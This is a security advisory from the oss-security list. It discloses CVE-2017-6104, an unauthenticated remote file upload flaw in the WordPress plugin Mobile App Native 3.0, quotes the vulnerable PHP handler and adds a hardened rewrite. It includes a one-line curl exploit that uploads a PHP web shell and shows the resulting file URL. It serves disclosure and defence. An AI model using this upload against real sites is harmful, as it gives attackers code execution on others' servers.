Message-id: <798D4367-AFCB-43FF-A603-F296E7E38ECE@me.com>
Date: Thu, 02 Mar 2017 13:52:23 -0500
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0

Title: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0
Author: Larry W. Cashdollar, @_larry0
Date: 2017-02-27
Download Site: https://wordpress.org/plugins/zen-mobile-app-native/
Vendor: https://profiles.wordpress.org/zendkmobileapp/
Vendor Notified: 2017-02-27
Vendor Contact:

Description:
Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.

Vulnerability:
The code in file ./zen-mobile-app-native/server/images.php doesn't require authentication or check that the user is allowed to upload content. It also doesn't sanitize the file upload against executable code.

    <?php
    //header('content-type: text/html; charset=iso-8859-2');
    header('Content-Type: text/html; charset=utf-8');
    header('Access-Control-Allow-Origin: *');
    require_once('function.php');

    // No nonce, login or capability check precedes the upload handling.
    if ($_FILES['file']['name']) {
        if (!$_FILES['file']['error']) {
            $name = md5(rand(100, 200));
            // Extension is taken verbatim from the client-supplied filename;
            // there is no allowlist, so any extension (including .php) is kept.
            $ext = explode('.', $_FILES['file']['name']);
            $filename = $name . '.' . $ext[1];
            $destination = 'images/' . $filename;
            $location = $_FILES["file"]["tmp_name"];
            move_uploaded_file($location, $destination);
            echo $plugin_url.'/server/images/' . $filename;
        } else {
            echo $message = 'Ooops! Your upload triggered the following error: '.$_FILES['file']['error'];
        }
    }

CVE-ID: CVE-2017-6104

Exploit Code:

    $ curl -F "file=@...r/www/shell.php" "http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php"
    http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php

Advisory: http://www.vapidlabs.com/advisory.php?v=178
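For comparison with the handler quoted above, the following is an added example of how the same upload endpoint can be written with the three missing controls in place (request authentication, an authorization check, and an image-only allowlist decided by content inspection rather than the client-supplied filename). It is not the plugin's own code and is not part of the advisory; it assumes the handler is registered inside WordPress as an admin-ajax action, and the action name `zen_upload_image` and nonce action `zen_image_upload` are hypothetical names chosen for the example.

```php
<?php
// Added example, not the plugin's code. Assumes WordPress core is loaded
// (admin-ajax.php), so check_ajax_referer(), current_user_can(),
// wp_check_filetype_and_ext() and wp_handle_upload() are available.
// 'zen_upload_image' and 'zen_image_upload' are hypothetical names.

// Registering only the wp_ajax_ hook (and not wp_ajax_nopriv_) means
// WordPress rejects requests from visitors who are not logged in.
add_action('wp_ajax_zen_upload_image', 'zen_handle_image_upload');

function zen_handle_image_upload() {
    // 1. Request authentication: the caller must present a valid nonce,
    //    which also blocks cross-site request forgery.
    check_ajax_referer('zen_image_upload', 'nonce');

    // 2. Authorization: only users allowed to upload media may proceed.
    if (!current_user_can('upload_files')) {
        wp_send_json_error('insufficient privileges', 403);
    }

    if (empty($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
        wp_send_json_error('no file or upload error', 400);
    }

    // 3. Content restriction: an explicit allowlist of image types. The
    //    extension/MIME decision is made by WordPress from the file data and
    //    name together, not by splitting the client-supplied filename on '.'.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );
    $check = wp_check_filetype_and_ext(
        $_FILES['file']['tmp_name'],
        $_FILES['file']['name'],
        $allowed
    );
    if (empty($check['ext']) || empty($check['type'])) {
        wp_send_json_error('only image files are accepted', 415);
    }

    // 4. Storage: wp_handle_upload() re-validates the type against the same
    //    allowlist, generates a unique sanitized filename and writes the file
    //    under wp-content/uploads instead of a directory inside the plugin.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $result = wp_handle_upload($_FILES['file'], array(
        'test_form' => false,
        'mimes'     => $allowed,
    ));
    if (isset($result['error'])) {
        wp_send_json_error($result['error'], 400);
    }

    // Return the stored file's URL as JSON rather than echoing a raw string.
    wp_send_json_success(array('url' => esc_url_raw($result['url'])));
}
```

The allowlist is the control that matters most for this class of bug: with `mimes` restricted to image types, a file named `shell.php` is refused before it is written, whichever name or MIME type the client claims. As defence in depth, the web server should also be configured so that PHP is never executed from the uploads directory, which limits the impact should any upload check ever be bypassed.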